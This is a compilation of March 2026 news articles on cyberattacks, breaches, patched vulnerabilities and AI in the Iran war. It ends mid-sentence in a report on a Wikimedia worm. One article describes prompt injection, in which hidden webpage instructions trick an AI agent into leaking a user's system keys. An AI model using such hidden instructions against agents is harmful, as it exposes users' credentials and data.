| TechCrunch
techcrunch.com
Zack Whittaker
8:50 AM PDT · March 9, 2026

Salt Typhoon is by far one of the most prolific hacking groups in recent years, breaching some of the top American phone companies. Here are all the countries that have been targeted.

Salt Typhoon is behind one of the broadest hacking campaigns in recent years, targeting some of the world’s largest phone and internet companies and stealing tens of millions of phone records about senior government officials.

The hacking group, attributed to China, is part of a wider cluster of hackers with the collective aim of helping China prepare for an eventual war with Taiwan, according to researchers. U.S. officials have called China’s potential invasion of Taiwan an “epoch-defining threat.” Much of the group’s efforts have focused on hacking Cisco routers at the edge of a company’s network to break in and taking control of surveillance devices that U.S. telecom companies are legally required to install to allow law enforcement to monitor calls and messages.

While Salt Typhoon is focused on hacking telecom infrastructure, other China-hacked groups like Volt Typhoon are prepositioning for destructive cyberattacks capable of causing widespread disruption, and Flax Typhoon runs a botnet of hijacked internet-connected devices for hiding the hackers’ malicious internet traffic.

But Salt Typhoon is by far one of the most prolific hacking groups in recent years, including targeting some of the top American phone companies.

The hacks allowed China to obtain call records, text messages, and captured phone audio from senior U.S. officials, many of whom were considered government targets of interest. This prompted the FBI to urge Americans to switch to end-to-end encrypted messaging apps, fearing that a foreign adversary could eavesdrop on their communications.

Salt Typhoon went even further, hacking at least 200 companies around the world, according to FBI officials. The list of affected countries keeps growing.

Here are the countries that have attributed hacks to Salt Typhoon.

United States
Some of the top U.S. phone companies, including AT&T and Verizon, were confirmed hacked by Salt Typhoon, as was internet provider CenturyLink (now Lumen). T-Mobile said it was targeted but that the hackers had no access to its customers’ calls, text messages, or voicemails.

Satellite communications giant Viasat was also compromised, allowing hackers to gain access to tools used by law enforcement to access the communications of others.

Internet and data providers Charter Communications (Spectrum) and Windstream were also named as Salt Typhoon victims. Fiber network giant Consolidated Communications was reportedly hacked as part of the campaign.

The hackers didn’t just target phone and internet providers. Per several reports, Salt Typhoon compromised the networks of a U.S. state’s National Guard, allowing them to steal data and access to other networks in every other U.S. state and several territories.

North and South America
According to security firm Recorded Future, its researchers have seen Salt Typhoon target Cisco devices associated with universities in Argentina and Mexico and elsewhere.

Meanwhile, the Canadian government confirmed that its top telecommunications firms were hacked by China as part of Salt Typhoon’s extended espionage campaign. Canada also confirmed several Cisco routers at one telecom giant were hacked to steal data from the company.

The government in Ottawa warned it saw targeting of companies that were “broader than just the telecommunications sector.”

Trend Micro said it saw Salt Typhoon activity in Brazil, the most populous country in South America.

Asia, Africa, and Oceania
Recorded Future said it’s seen Salt Typhoon targeting at least one Myanmar-based telecoms provider, Mytel, by way of hacked Cisco routers, as well as a South African telecommunications provider. It’s also seen attacks targeting routers of universities across Bangladesh, Indonesia, Malaysia, and Thailand.

Japan has also warned of the threat of Salt Typhoon to its networks.

Both the governments of Australia and New Zealand say they’ve seen Salt Typhoon activity in their telecom and critical infrastructure sectors. New Zealand said it also saw Salt Typhoon hackers across the government sector, as well as transportation, lodging, and military infrastructure networks.

Trend Micro also said it found at least 20 compromised organizations across the telecoms, consulting, chemical, and transportation industries, as well as government agencies and nonprofits in various countries, including Afghanistan, Eswatini, India, Taiwan, and the Philippines.

Europe
The British government has confirmed that a “cluster of activity” from Salt Typhoon was seen across the United Kingdom. While the activity wasn’t specified, news reporting suggests that senior U.K. government staff may have had their phone records tapped and text messages read.

Norway has also confirmed Salt Typhoon hacked several organizations in the country.

Dutch authorities in the Netherlands say that several smaller internet providers and web hosts were targeted and had access to routers, but their internal networks were not compromised.

An Italian internet provider was hacked, per Recorded Future.

And, according to Czech cybersecurity officials, incidents related to Salt Typhoon hacks have been witnessed in Finland and Poland.

bleepingcomputer.com
By Sergiu Gatlan
March 9, 2026

Ericsson Inc., the U.S. subsidiary of Swedish networking and telecommunications giant Ericsson, says attackers have stolen data belonging to over 15,000 employees and customers after hacking one of its service providers.

Ericsson Inc., the U.S. subsidiary of Swedish networking and telecommunications giant Ericsson, says attackers have stolen data belonging to over 15,000 employees and customers after hacking one of its service providers.

Headquartered in Stockholm and founded in 1876, the parent company is a communications tech leader with nearly 90,000 employees worldwide.

In data breach notification letters sent to affected individuals and filed with the California Attorney General on Monday, Ericsson said that a service provider who was storing personal data for employees and customers discovered a breach on April 28, 2025.

After detecting the incident, the third-party vendor notified the FBI and hired external cybersecurity experts to assess the extent of the breach and its impact.

The investigation, which was completed last month, found that a total of 15,661 individuals had their data exposed in the incident. However, Ericsson noted that the compromised provider has yet to find evidence that the data has been misused since the breach.

"Based on the investigation, our service provider determined that a limited subset of files may have been accessed or acquired without authorization between April 17, 2025 and April 22, 2025," Ericsson said.

"As part of its investigation, it retained external data specialists to conduct a comprehensive review of the potential affected files to identify any personal information. That review was completed on February 23, 2026 at which time we determined that that some of your personal information was contained within the affected files."

According to a separate filing with the Texas Attorney General, the exposed information includes affected individuals' names, addresses, Social Security Numbers, Driver’s License numbers, government-issued ID numbers (e.g., passport, state ID cards), financial Information (e.g., account numbers, credit or debit card numbers), medical Information, and dates of birth.

Ericsson is now providing free IDX identity protection services, including credit monitoring, dark web monitoring, identity theft recovery, and a $1 million identity fraud loss reimbursement policy to affected people who enroll by June 9, 2026.

Although the company flagged this incident as a data theft attack, no cybercrime group has taken responsibility for the breach. This raises the possibility that either the third-party vendor paid the ransom demanded by the attackers or that the threat actors were unable to connect the breach to Ericsson.

When BleepingComputer reached out for more details on the breach, including the total number of affected individuals, an Ericcson spokesperson said they didn't have "anything to share beyond the letter."

Update March 10, 06:39 EDT: In a filing with Maine's Attorney General, Ericsson says the breach affects a total of 15,661 individuals.

calcalistech.com
Hofit Cohen Azulay
12:55, 12.03.26

Cyberattack affects platform advertising screens; national cybersecurity authorities investigate.

A cyberattack targeted advertising signs in the passenger halls at Herzliya Station and Shalom Train Station in Tel Aviv on Wednesday. It is estimated that Iranian hackers took control of the signs and posted messages claiming that the stations were expected to be attacked by Iranian missiles and instructing the public to evacuate immediately.
Israel Railways clarified that these signs are not connected to the railway infrastructure and are located on platforms as part of a private provider’s advertising and information system. Shortly after the incident, the screens were taken offline. The National Cyber Directorate, in cooperation with Israel Railways, began investigating the source of the malfunction. Railways officials emphasized that the affected screens are part of an external network unrelated to essential railway infrastructure. Therefore, there was no risk to critical systems or the railway's passenger information system (PIS).

Earlier, Iran’s Fars News Agency falsely claimed that Israel’s entire railway system had been hacked and disabled. The agency stated:
"Israel’s railways have been hacked. As a result of a cyberattack, the enemy’s railway system has been disabled. All [Israeli railway] stations are not safe until further notice."

Following the incident, Israel Railways announced on Thursday that, in accordance with Home Front Command guidelines, it is continuing efforts to resume service on travel routes, increase train frequency, and reopen additional stations.

| South China Morning Post
scmp.com
Ben Jiangin Beijing
Published: 10:14pm, 10 Mar 2026

Cybersecurity agency cautions that improper installation and use of the AI agent carry severe security and data risks.

China’s cybersecurity agency on Tuesday issued a second warning about security and data risks tied to OpenClaw, despite a rush among local governments and tech companies to adopt the artificial intelligence agent amid a nationwide frenzy.

At a time when major Chinese cloud service providers were touting easy deployment of OpenClaw to capitalise on its popularity, improper installation and use of the agent had also led to severe security risks, said the National Computer Network Emergency Response Technical Team/Coordination Center of China (CNCERT), a non-governmental and non-profit cybersecurity technical platform, in a notice published on its WeChat account.

Released by Austrian developer Peter Steinberger late last year, OpenClaw is a software that is taking the world by storm for its ability to perform tasks on a user’s behalf, organising and responding to emails, drafting work reports and preparing slide decks.

CNCERT partly blamed OpenClaw’s security challenges on its ability to perform tasks autonomously, which required high-level permissions that heightened exposure to breaches.

The agency said OpenClaw was vulnerable to threats including “prompt injection”, in which attackers embed hidden malicious instructions in webpages which, when read by the software, could trick it into leaking a user’s system keys.

It was also prone to “operational errors”, in which the agent may misinterpret user commands and unintentionally delete critical information, including emails and important files, potentially causing significant data loss.

bleepingcomputer.com
By Sergiu Gatlan
March 12, 2026

Data protection company Veeam Software has patched multiple flaws in its Backup & Replication solution, including four critical remote code execution (RCE) vulnerabilities.

VBR is enterprise data backup and recovery software that helps IT administrators to create copies of critical data for quick restoration following cyberattacks and hardware failures.

Three RCE security flaws patched today (tracked as CVE-2026-21666, CVE-2026-21667, and CVE-2026-21669) allow low-privileged domain users to execute remote code on vulnerable backup servers in low-complexity attacks.

The fourth one (tracked as CVE-2026-21708) allows a Backup Viewer to gain remote code execution as the postgres user.

Veeam also addressed several high-severity security bugs that can be exploited to escalate privileges on Windows-based Veeam Backup & Replication servers, extract saved SSH credentials, and bypass restrictions to manipulate arbitrary files on a Backup Repository.

These vulnerabilities were discovered during internal testing or reported through HackerOne and are resolved in Veeam Backup & Replication versions 12.3.2.4465 and 13.0.1.2067.

Veeam also warned admins to upgrade the software to the latest release as soon as possible, since threat actors often begin developing exploits shortly after patches are released.

"It's important to note that once a vulnerability and its associated patch are disclosed, attackers will likely attempt to reverse-engineer the patch to exploit unpatched deployments of Veeam software," the company warned. "This reality underscores the critical importance of ensuring that all customers use the latest versions of our software and install all updates and patches without delay."

VBR servers targeted in ransomware attacks
VBR is popular among managed service providers and mid-sized to large enterprises, even though ransomware gangs commonly target VBR servers because they can serve as a quick jumping-off point for lateral movement within breached networks, simplify data theft, and make it easy to block restoration efforts by deleting victims' backups.

The financially motivated FIN7 threat group (which previously collaborated with the Conti, REvil, Maze, Egregor, and BlackBasta ransomware groups) and the Cuba ransomware gang have both been linked to past attacks targeting VBR vulnerabilities.

Sophos X-Ops incident responders also revealed in November 2024 that Frag ransomware exploited another VBR RCE bug disclosed two months earlier and also used in Akira and Fog ransomware attacks starting in October 2024.

Veeam says its products are used by more than 550,000 customers worldwide, including 74% of Global 2,000 firms and 82% of Fortune 500 companies.

Gizmodo
By Ece Yildirim
Published March 11, 2026

State-aligned media released a list naming the offices of Microsoft, Palantir, and more as potential targets of military action.
A news agency affiliated with the Iranian regime released a list of American tech companies with links to American and Israeli military operations as new targets for Iran on Wednesday.

According to Al Jazeera, the Tasnim News Agency’s report lists Microsoft, Google, Palantir, IBM, Nvidia, and Oracle’s offices and cloud infrastructure in Israel and some Gulf countries as the new targets.

On top of targeting the tech giants, a spokesperson for a group owned by Iran’s Islamic Revolutionary Guard Corps told Al Jazeera that American and Israeli economic centers and banks in the region are also legitimate targets now, and warned people to “not be within a one-kilometre radius of banks.”

The list comes on the heels of an Israeli attack on a bank in Iran’s capital city of Tehran, according to Tasnim News Agency, which expanded “the scope of the regional war” to an “infrastructure war.”

The United States and Israel began their military campaign against Iran at the end of last month, with Iran responding with retaliatory strikes on Israeli soil and on American military bases in the region from Cyprus and Turkey to the Gulf countries.

As the war entered its 12th day, more than 1,300 civilians in Iran have been killed, including 175 people (most of them children) at an elementary school in southern Iran, reportedly struck by American missiles.

All six of the tech giants named by Iranian media have lucrative partnerships with the Pentagon and/or Israel. Nvidia is building data centers and a research and development campus in Israel, a country that CEO Jensen Huang has recently called “Nvidia’s second home.” Microsoft, Google, Palantir, IBM, and Oracle all have a close history with the Israeli government and military, with some reports claiming that the AI technology provided by these American tech giants is aiding the army in the mass surveillance of Palestinians. Meanwhile, Google, Oracle, IBM, Microsoft, and Palantir also have military AI agreements with the Pentagon.

Though not named by Tasnim, another American tech giant with ties to both American and Israeli military operations is Amazon. One of the company’s operating facilities in Bahrain and two of its data centers in the United Arab Emirates were heavily damaged earlier this month following Iranian drone strikes. The strikes, which Iranian state media later described as targeted, led to power disruptions and degraded AWS applications in the region.

So far, Iran’s military actions have been limited to the region. That could change, according to an ABC News report also from Wednesday, as the FBI has claimed Iran could launch drone strikes on the West Coast of the United States, where the headquarters of tech giants like Google, Nvidia, and Microsoft are located. But the chances of that happening are very slim, as even President Trump himself has said he is not worried, and the Iranian report explicitly threatens damage to the offices and infrastructure that these tech companies have in the Middle East.

WSJ wsj.com By
Daniel Michaels
and
Dov Lieber

March 7, 2026 12:00 pm ET

The U.S. and Israeli attacks on Iran have unfolded at unprecedented speed and precision thanks to months of planning, a massive assemblage of military force and a cutting-edge weapon never before deployed on this scale: artificial intelligence.

AI tools are helping gather intelligence, pick targets, plan bombing missions and assess battle damage at speeds not previously possible. AI helps commanders manage supplies of everything from ammunition to spare parts and lets them choose the best weapon for each objective.

Before Israeli jet fighters launched ballistic missiles that killed Iran’s Supreme Leader Ali Khamenei at his residence a week ago, launching the current regional war, Israeli intelligence services had for years been monitoring hacked Tehran traffic cameras and eavesdropping on senior officials’ communications—increasingly relying on AI to sift through a flood of intercepts.

The use of AI in the campaign against Iran follows years of work by the Pentagon and lessons learned from other militaries. Ukraine—with U.S. help—increasingly relies on AI in its war against Russia. Israel has tapped AI in conflicts at least since the October 2023 Hamas attacks.

Defense Secretary Pete Hegseth has urged accelerated adoption of AI to create “an ‘AI-first’ warfighting force.” At the same time, he is engaging in a public battle with Anthropic, a critical AI supplier, and the Pentagon has contracted with rival OpenAI to use its models in classified settings. President Trump has ordered the government to stop using Anthropic’s products. But U.S. officials say the fight unfolding in Iran is showing the usefulness of Anthropic’s AI agent, Claude.

The U.S. and Israel have declined to discuss exactly how they are employing AI in the widening conflict, but recent comments from military leaders and technical experts provide a window.

Most military AI applications aim to give commanders and planners more complete information, faster than is now possible. That, in turn, should let them make better and quicker decisions than the enemy can, gaining a battlefield advantage.

The U.S. says it has struck more than 3,000 targets in Iran since the attacks began Saturday, using an array of weapons including attack drones launched from ships, F-22 jet fighters taking off from Israel and B-2 stealth bombers flying from the U.S.

While the complexity of managing so many aircraft and weapons is getting a boost from AI, its use remains limited and the cost of badly informed decisions remains high. U.S. military investigators believe American forces likely were responsible for a strike on the war’s first day that killed dozens of children at a girls elementary school in Iran, The Wall Street Journal reported.

Talk of military AI can conjure images of killer robots, but the reality is that its biggest uses now are often off the battlefield, in time-consuming and labor-intensive fields like intelligence, mission planning and logistics.

These noncombat areas are ripe for AI-inspired efficiency because out of every 10 people in the military, at most two face combat. Up to 90% of personnel are in support roles.

The Pentagon’s AI tools are similar to ChatGPT and other mass-market large language models, but limited to warfare and trained to tackle specific tasks using relevant information, seeking to avoid glitches and inaccuracies often besetting AI.

Still, war is among the most chaotic and complex human endeavors—posing unique problems for even the cutting edge of robotic thinking. The Pentagon’s first AI chief, retired Air Force Lt. Gen. Jack Shanahan, said building military AI is tough in part because much of the available data for training is out of date or unclear.

“The Department of Defense was built as a hardware company in the industrial age, and it has struggled to become a digital company in a software-centric era,” said Shanahan, who oversaw an AI-powered project in Iraq, dubbed Maven, almost a decade ago.

Military strikes start with intelligence. Gathering and parsing it can require thousands of analysts grinding for hours over communications intercepts, photographs and radar images as they try to divine the locations of missile launchers, tunnels and other targets.

Human analysts can examine at most 4% of the intelligence material that is typically collected, say U.S. officers who have worked in the field.

“The biggest immediate impact of AI is in intelligence,” said Israeli Col. Yishai Kohn, the defense ministry’s head of planning, economics and IT. “Many potential missions simply never happened because the manpower didn’t exist” to assess vital intelligence, said Kohn.

AI-powered machine vision can now quickly find vast numbers of targets—with the ability to single out specific models of aircraft or vehicles. It can listen for and summarize relevant conversations from intercepts.

“Intelligence agencies already have access to tons of video data, and current AI enables them to detect exactly what they need within an ocean of data,” said Matan Goldner, chief executive of Conntour, an Israeli company selling software to its and other countries’ security agencies that allows them to query video databases the same way LLMs are used to find patterns in texts.

Just as with mass-market AI, users can bore into results with queries, such as to identify every missile launcher located near a hospital. They can also set the system to alert when an event happens, such as “Tell me every time someone takes a photo near this military base.”

The U.S. Army’s 18th Airborne Corps, using software from data company Palantir Technologies in a continuing string of exercises dubbed Scarlet Dragon, matched its own record from Iraq as the military’s most efficient targeting operation ever, according to Emelia Probasco, a senior fellow at Georgetown University’s Center for Security and Emerging Technology. Thanks to AI, the corps achieved that with only 20 people, compared with more than 2,000 staffers employed in Iraq, she said.

Militaries in the North Atlantic Treaty Organization are using AI to track Russia’s shadow fleet of tankers, scanning millions of square miles several times a day for vessels that are illegally transferring fuel at sea, said French Adm. Pierre Vandier, NATO’s top officer for digital transformation. Imagery is then linked to ship identities for closer tracking and potential action, he said.

Vandier said AI is turning military intelligence analysis from a task of groping in darkness for targets to one of sifting through piles of them. “The number of targets you can nominate through AI is just skyrocketing,” Vandier said.

To prioritize targets and develop a course of action, the Pentagon is increasingly using AI to run models and digital wargames. In one of many efforts, last year it contracted with Pittsburgh-based Strategy Robot to develop advanced systems that can churn through vast numbers of scenarios despite imperfect information. From potentially millions of iterations, planners can zoom in on actions that are more likely to achieve their objectives.

In the pre-AI world, after rough outlines were agreed on for an operation, commanders and specialists would develop mission plans, compiling paper-stuffed binders in a weekslong exercise. AI can potentially do the same work in days, military leaders say.

Planning any military assault—from the fast, targeted mission in January to seize Venezuelan strongman Nicolás Maduro to the war with Iran—brings together subject-matter specialists including intelligence officers, combat commanders, weapons experts and logistics managers. Sessions can include around 40 people.

“The more people you add into planning, the longer it takes,” said a U.S. Army officer in Europe with experience in the process.

As preparations advance and plans evolve, each specialist revises their own plans, with knock-on effects for the others. If intelligence reports, for example, shift a bombing target to a more-distant objective, commanders may opt to use different aircraft or weapons, which in turn can affect crew rostering, flight planning and fuel consumption.

Until now, updating all those factors was slow and often subjective. Now AI can process complex interactions instantaneously, accounting for how each change ripples through military choreography.

Once a strike occurs, AI can speed assessments of battle damage, via image-processing software like tools helping with initial intelligence. While analysis is limited by the quality of imagery—which can depend on factors as basic as weather and whether a target is above ground—AI’s ability to merge varied inputs is changing the discipline. In a process known as sensor fusion, AI can digest visuals, radar, heat signatures and mass-spectroscopy to synthesize a list of possible conclusions. Fast analysis of where attacks succeeded or failed in turn helps refine lists of subsequent targets.

One thing AI can’t replace is human judgment. Many military officials involved in AI projects warn that the technology’s capabilities risk prompting an overreliance on information it provides—a trend linked with the phrase “The computer said to do this.”

Offloading decisions to AI “is a serious concern,” said Probasco at Georgetown, who held various posts in the Navy. She said that, as with other weapons systems, safeguards must be implemented to limit risks. “That infrastructure is underinvested in now,” she said.

theguardian.com
Daniel Boffey Chief reporter
Sat 7 Mar 2026 12.00 CET

Iran’s targeting of commercial datacentres in the UAE and Bahrain signals a new frontier in asymmetric warfare

It is believed to be a first: the deliberate targeting of a commercial datacentre by the armed forces of a country at war.

At 4.30am on Sunday morning, what is thought to have been an Iranian Shahed 136 drone struck an Amazon Web Services datacentre in the United Arab Emirates, setting off a devastating fire and forcing a shutdown of the power supply. Further damage was inflicted as attempts were made to suppress the flames with water.

Soon after, a second data centre owned by the US tech company was hit. Then a third was said to be in trouble, this time in Bahrain, after an Iranian drone turned to fireball on striking land nearby.

Iranian state TV has claimed that Iran’s Islamic Revolutionary Guard Corps launched the attack “to identify the role of these centres in supporting the enemy’s military and intelligence activities”.

The network built by Jeff Bezos’s company could withstand one of its regional centres being taken out of action but not a second.

The coordinated strike had an immediate impact.

Millions of people in Dubai and Abu Dhabi woke up on Monday unable to pay for a taxi, order a food delivery, or check their bank balance on their mobile apps.

Whether there was a military impact is unclear – but the strikes swiftly brought the war directly into the lives of 11 million people in the UAE, nine out of 10 of whom are foreign nationals. Amazon has advised its clients to secure their data away from the region.

Perhaps more significantly, the strikes on this ‘next generation’ war target are now raising questions about the prospects of the UAE building on its plans, and many billions of pounds worth of US and other foreign investment, to exploit what they hope will be the ‘new oil’: artificial intelligence (AI).

“The UAE really wants to be a major AI player,” said Chris McGuire, an AI and technology competition expert who served as a White House national security council official in Joe Biden’s administration. “Their government has very strong conviction about this technology, probably stronger than any other government in the world, and if there’s going to start to be security questions around that, then they’re going to have to resolve those very quickly, somehow.”

A datacentre is a facility designed to store, manage, and operate digital data.

The growing demand by businesses for artificial intelligence (AI) and cloud computing – where firms have a pay-as-you-go relationship with the providers of servers, storage and software – is driving the need for centres that have significantly more computational power.

It requires a ready and consistent supply of very cheap electricity.

The UAE, as it seeks to diversify away from fossil fuels, has been able to point out that it has this in spades, along with a huge sovereign wealth fund ready to invest and subsidise projects.

According to Turner & Townsend’s Global Data Centre Index, the overall global cost increase of datacentre construction increased in 2025 by 5.5% – but the UAE ranks 44th in the league table of most expensive unit cost per watt out of 52.

The UAE’s geography also makes it a critical subsea cable landing point, providing access between Europe and Asia.

Then there are the geo-politics, with the US keen to keep the Gulf states away from Chinese technology.

A four-day tour by Donald Trump of Saudi Arabia, Qatar, and the UAE last May coincided with the announcement of the construction of a vast new AI campus – a partnership between the UAE and the US – for the purpose of training powerful AI models.

As part of the deal, the Trump administration eased restrictions on advanced chips sales to the Gulf. OpenAI has said the planned UAE campus could eventually serve half the world’s population.

McGuire said that this week’s events could be pivotal. “If we’re going to have large scale datacentres built out in the Middle East, we’re going have to get pretty serious about how we protect them,” he said. ‘We think about how to protect it right now, and we’re saying, ‘Oh, it means you have guards and good cybersecurity’.

“If you’re actually going to double down the Middle East, maybe it means missile defence on datacentres.”

Sean Gorman, the chief executive of Zephr.xyz, a technology firm that is a contractor to the US air force, said that the Gulf states’ ambitions would have likely been in the thoughts of military planners in Tehran.

He said: “I believe the Iranians are building on tactics they’ve seen be effective in the Ukraine conflict. Asymmetric warfare that can target critical infrastructure creates pressure on adversaries by disrupting public safety and economic activity.

“UAE and Bahrain have both been positioning themselves as global AI hubs by investing heavily in datacentres and fibre infrastructure to connect them to the rest of the world.

“If they can disrupt that infrastructure, it puts their strategic position under risk while also disrupting operations that are important to the economy. In addition, there could be an adjacent impact of defence operations, but that would likely be more luck than the primary objective.”

Gorman said the UAE had a “long track record of managing regional instability without becoming party to it” but that there were a range of risks apart from that from the air.

He said: “The UAE also has one of the most diversified submarine-cable landing environments in the Middle East, but the diversity is geographically uneven.

“There are multiple landing stations and cable systems, but many of them concentrate on the east coast at Fujairah, which creates a partial geographic chokepoint.

“In addition, there is a specific risk from Iranian cyber operations targeting US-aligned digital infrastructure in the Gulf, which presents a more concrete near-term threat to datacentre and cloud operations than geography in the traditional sense.”

Gorman said the concern would be if Iran demonstrated any further capability to target Gulf digital infrastructure as part of its retaliation.

He said: “The UAE will need to show partners that its infrastructure is defensible. This is the question investors should be asking, not whether the broader AI ambition survives.”

Vili Lehdonvirta, professor of technology policy at Aalto university and senior fellow at the Oxford Internet Institute, University of Oxford, said there were significant costs to such defences but that the danger was real.

The former chair of the US National Security Commission on AI, Eric Schmidt, suggested last year that a country falling behind in an AI arms race could bomb their adversary’s datacentres.

Lehdonvirta said he suspected that no one actually believed that datacentres “would get bombed despite such scenarios being openly floated for some time”.

“If that’s the case then from now on we might perhaps see operators of prominent datacentres like AWS [Amazon Web Services] investing in air defence, similar to how shipping operators armed up against pirates,” he said.

Where might Iran fruitfully strike next?

“The Iranians will be well aware that the fibreoptic cables that connect these datacentres to the United States and to the rest of the world run through the strait of Hormuz,” Lehdonvirta said, “although they’ll be closely watched by the US and allied forces.”

You've read 23 articles in the last

| Computer Weekly
computerweekly.com
By
Alex Scroxton, Security Editor
Published: 05 Mar 2026 15:00

Exploitation of zero-days by commercial surveillance and spyware developers outpaced exploitation by nation-state actors last year, according to a report.

Suppliers of commercial spyware have edged ahead of nation-state threat actors when it comes to the exploitation of zero-day vulnerabilities at scale, according to data released by the Google Threat Intelligence Group (GTIG).

In a report titled Look what you made us patch: 2025 zero-days in review, the GTIG team said that of 42 unique zero-days it tracked in 2025, it was able to firmly attribute first exploitation of 15 to commercial surveillance vendors (CSVs), compared with 12 that were first exploited by nation-states – seven by China, and nine by financially motivated cyber criminals.

The data additionally highlight three zero-days that were “likely” exploited by China, and one possibly at the intersection of cyber crime and nation-state activity.

The GTIG team, comprising researchers Casey Charrier, James Sadowski, Zander Work, Clement Lecigne, Benoît Stevens and Fred Plan, wrote that despite CSVs increasingly focusing on operational security to obscure their unethical activity, the growth in their activity reflected a trend dating back several years.

“Historically, traditional state-sponsored cyber espionage groups have been the most prolific attributed users of zero-day vulnerabilities,” they said. “[But] over the last few years, the increase of zero-day exploitation attributed to CSVs and their customers has demonstrated the growing ability of these vendors to provide zero-day access to a wider range of threat actors than ever before.

“GTIG has reported extensively on the capabilities CSVs provide their clients, as well as how many CSV customers use zero-day exploits in attacks which erode civil liberties and human rights,” they added.

“In late 2025, we reported on how Intellexa, a prolific procurer and user of zero-days, adapted its operations and tool suite and continues to deliver extremely capable spyware to high paying customers.”

China-nexus threat actors
Beyond CSVs, China-nexus threat actors were the most prolific exploiters of new zero-days, predominantly focusing on edge and networking devices that are hard to monitor, as they seek to gain long-term footholds in their targets’ operations.

GTIG said it was clear that China-nexus espionage actors have become increasingly adept at developing and sharing exploits among themselves, demonstrating their government is prepared to shower them with plentiful technical, and presumably financial, resources – compared with the other “Big Four” states of Iran, North Korea and Russia.

Russian cyber criminals, on the other hand, continue to make a killing and remain able to similarly invest in technical expertise, as evidenced last year by Cl0p’s extortion campaign targeting flaws in Oracle E-Business Suite, and the exploitation of a flaw in the WinRAR file archiver by a group with possible links to the long-standing and ever-present Evil Corp crew.

Overall zero-day volumes remain on par
All this said, more widely, GTIG observed a total of 90 zero-days under active exploitation during 2025, lower than 2023’s record high of 100, but generally in the 60 to 100 range that has become established since the Covid-19 pandemic.

Of these 90 flaws, the raw number and proportion – 43% and 48%, respectively – of these targeted enterprise technology, with zero-days increasingly affecting security and network edge devices, favoured by both cyber criminals and nation-states alike.

CSVs, on the other hand, tended to prefer mobile and browser exploits, the overall volume of which is ebbing and flowing – well up on 2024, but about on par with 2023 – likely thanks to more focused actions from the likes of Google on Android and Apple on iOS, which have forced such threat actors to expand or adjust their techniques, leading to the peaks and troughs.

Broken out by supplier, GTIG found that the clear majority of zero-days understandably target Microsoft, which accounted for 25 in total. This was followed by Google, with 11; Apple, with eight; Cisco and Fortinet, tied on four; and Ivanti and VMware, with three. Six more suppliers had two zero-days each, and the remaining 20 were split across 20 suppliers.

Looking ahead into 2026, GTIG said that as supply-side actors continue their work to make zero-day exploitation tougher for the bad guys – particularly in the mobile space – adversaries will unfortunately continue to hone their skills as well, foreshadowing more expansive techniques and a growing diversity of targets.

The team said that enterprise exploitation in particular will widen thanks to the sheer breadth of applications and devices now in use, with only a single-point-of-failure needed for threat actors to engineer a breach.

The AI factor
The team also expects artificial intelligence (AI) to accelerate the race between attackers and defenders, with AI increasingly used to automate and scale attacks by accelerating recon activity and, critically, exploit discovery and development.

This will put more pressure on defenders to detect and respond to zero-days, but at the same time, they will of course be able to take advantage of AI tools – like agents – in their own work.

GTIG also indicated an emerging paradigm for zero-day exploitation in 2026, heralded by the Brickstorm malware campaign, in which data theft “has the potential to enable long-term zero-day development”.

Rather than merely stealing sensitive client data, Brickstorm’s actors – known as Warp Panda – used it to target their intellectual property, such as source code and development documents, something they could use to work angles on new zero-days in their victims’ software.

politico.com
By Maggie Miller
03/04/2026 07:00 PM EST

But it’s unclear if the strike has fully taken out Iran’s ability to launch cyberattacks as the Middle East war expands.
The Israel Defense Forces on Wednesday said it bombed a compound in Tehran housing Iran’s cyber warfare headquarters — but it’s unclear whether the strike will significantly kneecap Iran’s cyberattack capabilities.

According to a statement from the IDF, its forces on Wednesday carried out a “wide-scale strike” targeting a collection of military sites on the Eastern edge of Tehran that allegedly housed the headquarters of the Iranian Islamic Revolutionary Guards Corps. The IDF claims that the headquarters of the IRGC’s “cyber and electronic headquarters” and its “Intelligence Directorate” were among the military outposts hit in the strike.

It’s unclear to what extent these military sites were damaged or whether there were any casualties. Iran remains under an almost total internet blackout, which began on Feb. 28 when the first U.S. and Israeli strikes began, limiting the flow of information coming out of Iran.

Spokespeople for the IDF and for the Israeli Embassy in Washington did not respond to requests for comment. A spokesperson for the White House declined to comment on whether the U.S. was involved in the strikes and instead deferred to U.S. Central Command, which did not respond to a request for comment.

The IRGC has been linked to major cyber operations against the U.S. in recent years, including a hack and leak attack against the presidential campaign of Donald Trump in 2024.

Iran-linked hackers have been hitting back against the U.S., Israel and surrounding Gulf nations since the U.S.-led military operation on Saturday, which resulted in the assassination of Iranian Supreme Leader Ayatollah Ali Khamenei. According to findings from Israeli cyber firm Check Point Software, two types of surveillance cameras popular across Israel, Qatar, Bahrain and other Middle Eastern nations were compromised by Iranian-linked hackers, likely to monitor missile-related damage to those nations.

Researchers from cybersecurity company Palo Alto Networks’ Unit42 have also tracked dozens of pro-Iran hacktivist groups launching cyberattacks since Feb. 28, largely targeting critical infrastructure. These groups have claimed responsibility for compromises to Israeli payment systems and the temporary shutdown of Kuwaiti government websites.

One of these groups, Handala, has ties to the Iranian Ministry of Intelligence and Security, and claimed responsibility this week for attacks on an Israeli oil and gas energy company and the shutdown of some Jordanian gas stations.

It’s difficult to verify whether this group actually carried out these attacks. Jordan’s cybersecurity agency confirmed earlier this week that it had thwarted an Iranian cyberattack on wheat silo management systems in the country.

Despite the IDF’s strikes against the IRGC’s cyber command centers, cyberattacks linked to outside actors sympathetic to Iran may continue relatively unscathed.

Lt. Gen. Charles Moore, former deputy commander of U.S. Cyber Command, which handles offensive U.S. cyber operations against adversaries, said Wednesday that the IDF strikes will likely have “a significant impact on the regime’s ability to continue to execute these types of operations.” Still, Moore said, “that doesn’t mean proxy forces or others that are ideologically aligned with the regime can’t still attempt to conduct operations against us or Israel.”

The Iranian government has often relied on proxy groups outside the country, including those based in Russia, to carry out cyberattacks or disinformation campaigns on its behalf. This makes it harder to trace efforts back to the Iranian regime and more difficult for impacted countries to respond to these types of decentralized attacks.

“Cyber is now embedded in modern conflict, and operational impact does not require all operators to be physically located in Tehran,” said Alexander Leslie, senior advisor on government affairs at cybersecurity company Recorded Future.

bleepingcomputer.com
March 5, 2026
By Lawrence Abrams

The Wikimedia Foundation suffered a security incident today after a self-propagating JavaScript worm began vandalizing pages and modifying user scripts across multiple wikis.
Update: Added Wikimedia Foundation's statement below and made a correction to denote it was only the Meta-Wiki that was vandalized.

The Wikimedia Foundation suffered a security incident today after a self-propagating JavaScript worm began modifying user scripts and vandalizing Meta-Wiki pages.

Editors first reported the incident on Wikipedia's Village Pump (technical), where users noticed a large number of automated edits adding hidden scripts and vandalism to random pages.

Wikimedia engineers temporarily restricted editing across projects while they investigated the attack and began reverting changes.

The JavaScript worm
